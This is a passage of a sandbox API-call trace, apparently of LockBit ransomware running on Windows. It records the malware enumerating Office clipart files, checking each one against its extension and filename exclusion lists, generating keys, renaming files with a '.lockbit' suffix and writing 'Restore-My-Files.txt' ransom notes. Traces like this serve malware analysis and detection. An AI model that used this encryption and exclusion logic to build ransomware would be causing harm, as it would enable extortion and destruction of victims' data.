Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00396_.WMF.lockbit") returned 72 [0161.849] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00396_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00396_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0161.850] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.850] malloc (_Size=0x40068) returned 0x3d70450 [0161.850] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=14534) returned 1 [0161.851] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.851] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0161.851] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.852] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0161.852] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0161.863] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00396_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00396_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.863] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.863] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.869] free (_Block=0x1fa2ed8) [0161.869] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00396_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.869] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.869] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.869] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239b0400, ftCreationTime.dwHighDateTime=0x1bd4b15, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x239b0400, ftLastWriteTime.dwHighDateTime=0x1bd4b15, nFileSizeHigh=0x0, nFileSizeLow=0x173e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00417_.WMF", cAlternateFileName="")) returned 1 [0161.869] lstrcmpiW (lpString1=".", lpString2="NA00417_.WMF") returned -1 [0161.869] lstrcmpiW (lpString1="..", lpString2="NA00417_.WMF") returned -1 [0161.869] PathFindExtensionW (pszPath="NA00417_.WMF") returned=".WMF" [0161.869] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.869] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.869] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.869] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.869] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.869] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.870] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.870] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.871] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00417_.WMF") returned 1 [0161.871] lstrcmpiW (lpString1="ntldr", lpString2="NA00417_.WMF") returned 1 [0161.871] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00417_.WMF") returned 1 [0161.871] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00417_.WMF") returned -1 [0161.871] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00417_.WMF") returned -1 [0161.871] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00417_.WMF") returned 1 [0161.871] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00417_.WMF") returned -1 [0161.872] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.872] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00417_.WMF") returned=".WMF" [0161.872] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.872] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.872] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.873] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.873] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.873] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.873] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.873] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.873] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.873] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.873] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00417_.WMF.lockbit") returned 72 [0161.873] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00417_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00417_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0161.874] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.874] malloc (_Size=0x40068) returned 0x3df0008 [0161.874] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5950) returned 1 [0161.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.875] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.875] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.875] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.875] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.879] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00417_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00417_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.879] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.879] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.880] free (_Block=0x1fa2ed8) [0161.880] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00417_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.880] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.880] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.880] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x313b9400, ftCreationTime.dwHighDateTime=0x1bd4aeb, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x313b9400, ftLastWriteTime.dwHighDateTime=0x1bd4aeb, nFileSizeHigh=0x0, nFileSizeLow=0x4696, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00433_.WMF", cAlternateFileName="")) returned 1 [0161.880] lstrcmpiW (lpString1=".", lpString2="NA00433_.WMF") returned -1 [0161.880] lstrcmpiW (lpString1="..", lpString2="NA00433_.WMF") returned -1 [0161.880] PathFindExtensionW (pszPath="NA00433_.WMF") returned=".WMF" [0161.880] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.880] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.880] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.880] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.881] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.882] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0161.882] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00433_.WMF") returned 1 [0161.882] lstrcmpiW (lpString1="ntldr", lpString2="NA00433_.WMF") returned 1 [0161.882] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00433_.WMF") returned 1 [0161.883] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00433_.WMF") returned -1 [0161.883] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00433_.WMF") returned -1 [0161.883] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00433_.WMF") returned 1 [0161.883] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00433_.WMF") returned -1 [0161.883] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.883] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00433_.WMF") returned=".WMF" [0161.883] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0161.883] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0161.883] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0161.884] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0161.884] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00433_.WMF.lockbit") returned 72 [0161.884] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00433_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00433_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.885] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.885] malloc (_Size=0x40068) returned 0x1ff1e60 [0161.885] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=18070) returned 1 [0161.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0161.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0161.887] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0161.898] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00433_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00433_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.898] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.899] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.901] free (_Block=0x1fa2ed8) [0161.901] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00433_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.901] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.901] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.901] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdea9aa00, ftCreationTime.dwHighDateTime=0x1bd4ae1, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdea9aa00, ftLastWriteTime.dwHighDateTime=0x1bd4ae1, nFileSizeHigh=0x0, nFileSizeLow=0x2f38, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00438_.WMF", cAlternateFileName="")) returned 1 [0161.901] lstrcmpiW (lpString1=".", lpString2="NA00438_.WMF") returned -1 [0161.901] lstrcmpiW (lpString1="..", lpString2="NA00438_.WMF") returned -1 [0161.901] PathFindExtensionW (pszPath="NA00438_.WMF") returned=".WMF" [0161.901] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0161.901] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0161.902] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0161.902] lstrcmpiW (lpString1=".msu", lpString2=".WMF") 